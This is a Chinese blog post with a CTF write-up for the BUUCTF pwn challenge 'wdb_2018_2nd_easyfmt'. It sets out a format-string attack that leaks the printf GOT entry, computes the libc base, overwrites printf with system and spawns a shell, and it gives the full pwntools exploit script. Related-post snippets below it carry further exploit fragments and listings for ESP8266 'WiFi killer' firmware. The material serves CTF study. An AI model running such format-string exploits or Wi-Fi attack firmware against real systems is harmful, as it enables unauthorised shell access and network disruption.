[BUUCTF-pwn]——wdb_2018_2nd_easyfmt

最新推荐文章于 2022-06-12 13:01:14 发布
最新推荐文章于 2022-06-12 13:01:14 发布
阅读量791 收藏
点赞数
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/114924318
版权

[BUUCTF-pwn]——wdb_2018_2nd_easyfmt

一个简单的格式化字符串利用问题

  • 泄露出got表地址,找到libc基地址
  • 寻找system的实际地址
  • 将printf_got修改为system的地址
  • 写入”/bin/sh"

exploit

from pwn import *
from LibcSearcher import *
context.log_level = "debug"

p = remote('node3.buuoj.cn',25125)
#p = process("./wdb_2018_2nd_easyfmt")
elf = ELF("./wdb_2018_2nd_easyfmt")
printf_got = elf.got["printf"]

payload1 = p32(printf_got) + "%6$s"
p.sendlineafter("repeater?\n",payload1)
p.recv(4)
printf_addr = u32(p.recv(4))
print("printf_addr ---> ",hex(printf_addr))

libc = LibcSearcher("printf", printf_addr)
libcbase = printf_addr - libc.dump("printf")
system = libcbase + libc.dump("system")

payload = fmtstr_payload(6,{printf_got: system})
p.sendline(payload)

p.sendline("/bin/sh\x00")
p.interactive()
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1205
这题出的很奇怪,本地调试不知道为什么出问题,远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 513
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
wdb_2018_2nd_easyfmt
z1r0的博客
12-30 744
wdb_2018_2nd_easyfmt 查看保护 fmt,偏移为6,直接泄露puts_got,拿到libc。改printf为system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26279) else: r = process(file_
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 2016
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1097
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 248
题目截图
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got
mcmuyanga的博客
03-08 1040
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got地址泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got地址 printf_got=elf.got["printf"] payloa
buuoj刷题记录 - wdb_2018_2nd_easyfmt
qq_34010404的博客
03-26 306
程序很简单,while(1)反复利用fmt漏洞: 泄露libc地址: main函数是由__libc_start_main函数调用的,所以main执行时,ebp下面那个就是__libc_start_main中的地址,而__libc_start_main函数是位于libc中的,利用printf把返回地址打出来就可以泄露libc基址了. 之后便可以劫持got了,直接改printf为system得需要修改4个字节,打远程还是算了,这里提供另一种方法. 把printf的got改为某个gadget,这个gadge
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 2119
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
[XCTF-pwn] 25_easyfmt
weixin_52640415的博客
03-08 511
格式化字符串漏洞,got.exit劫持,got.printf劫持 这题比上题要简单,先修改got.exit为main进入循环并漏洞libc地址,再将printf改为system,再输入/bin/sh int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+10h] [rbp-110h] BYREF unsigned __int64 v4; // [r
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2776
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got内容修改为0x400982,这样,我们就能一直处于...
攻防世界easyfmt
needlebulb的博客
06-12 338
主要思路为猜对后利用格式化字符串漏洞改写exit的got地址变成main函数过checkIn函数判断后的地址,这样就可以让程序反复执行且跳过猜数环节,然后格式化泄露puts的got地址,找到libc偏移,得到system地址,第三次循环改写printf的got变为system地址,第四次循环read时写入/bin/sh,完成getshell...
BUUCTF(pwn)wdb_2018_2nd_easyfmt
半岛铁盒的博客
04-03 558
32位格式化字符串修改got 做题思路 找到格式化字符的偏移量 打印print@got地址泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/sh\0’ from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29087) elf=ELF('./1') printf_got=elf.got['printf'] payload1=p32(printf_got)+"%6$s"
CTF泄漏libc基址的方法
liucc09的博客
01-05 4273
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
BUUCTF刷题5
m0_51251108的博客
10-30 628
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值